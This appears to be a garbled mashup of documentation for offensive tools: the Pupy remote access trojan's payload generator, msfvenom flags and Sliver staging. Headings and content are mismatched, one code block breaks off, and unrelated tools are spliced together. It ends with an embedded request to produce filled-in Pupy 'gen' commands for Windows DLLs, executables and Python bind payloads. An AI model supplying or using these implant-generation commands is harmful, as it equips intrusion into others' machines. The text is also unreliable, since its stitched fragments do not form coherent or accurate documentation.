To generate working payloads, you should have a complete comprehension of how things work. `transports`, `launchers`, `listeners` and `payloads` terms have to be understood before starting.  

## Transport
#[Pupy0](https://github.com/vecnathewhisperd/pupy0/wiki)
# High level overview

Three major components are required to use Pupy:
1. Management software (server side)
     - `pupysh`
2. Agent software (client side)
     - `pupy/payload_templates/*pupy*.*`
3. Python libraries for various OS/CPU combinations
     - `pupy/payload_templates/*OS*-*CPU*.zip`
## Payloads Generation

**Oneliners**: For one shot usage use `gen` command inside `pupysh`. Once you get the session back, kill the server using `CTRL-C`. If you want to let the server running non stop, use `pupygen.py` using exactly the same syntax as explained below.  

Payloads generation are done using the `gen` command.

## Payloads format

Payloads format represent the way to build our payload. Some are implemented and you should use one depending on the context and system you are targeting:
## Description

Pupy is a cross-platform, multi function RAT and post-exploitation tool mainly written in python. It features an all-in-memory execution guideline and leaves a very low footprint. Pupy can communicate using multiple transports, migrate into processes using reflective injection, and load remote python code, python packages and python C-extensions from memory.

## Features
```
>> gen -f <format> <launcher> -t <transport>
```
Here are some examples: 

- Windows dll
```
>> gen -S -f client -O windows -A x64 connect --host ip:port -t transport
```

- Windows executable
```
>> gen -f client -O windows -A x64 connect --host ip:port -t transport
```

- Python file - Bind
```
>> gen -f py bind --port port -t transport
```

- Python oneliner
```

# How to generate a payload

To generate a payload, there are two flags that you must supply (-p and -f):

* **The -p flag: Specifies what payload to generate**

To see what payloads are available from Framework, you can do:

```
./msfvenom -l payloads
```

The -p flag also supports "-" as a way to accept a custom payload:
## Transport

All transports in pupy are stackable. This mean that by creating a custom
transport conf (pupy/network/transport/<transport_name>/conf.py), you can make
you pupy session looks like anything. For example you could stack HTTP over
HTTP over base64 over HTTP over AES over obfs3 :o)
For this to work, we need the following pieces:

- a staging server (the Sliver server)
- a stage 2 payload (usually a Sliver shellcode, but can be in other formats)
- stagers (generated by `msfvenom`, the Sliver `generate stager` command, or a custom one)

## Example
```
Options:
    -p, --payload       <payload>    Payload to use. Specify a '-' or stdin to use custom payloads
        --payload-options            List the payload's standard options
    -l, --list          [type]       List a module type. Options are: payloads, encoders, nops, all
    -n, --nopsled       <length>     Prepend a nopsled of [length] size on to the payload

Domanda: Generate some examples like this about payload generation with Pupy: '>> gen -f <format> <launcher> -t <transport>'. Please replace the placeholders with appropriate values.
```
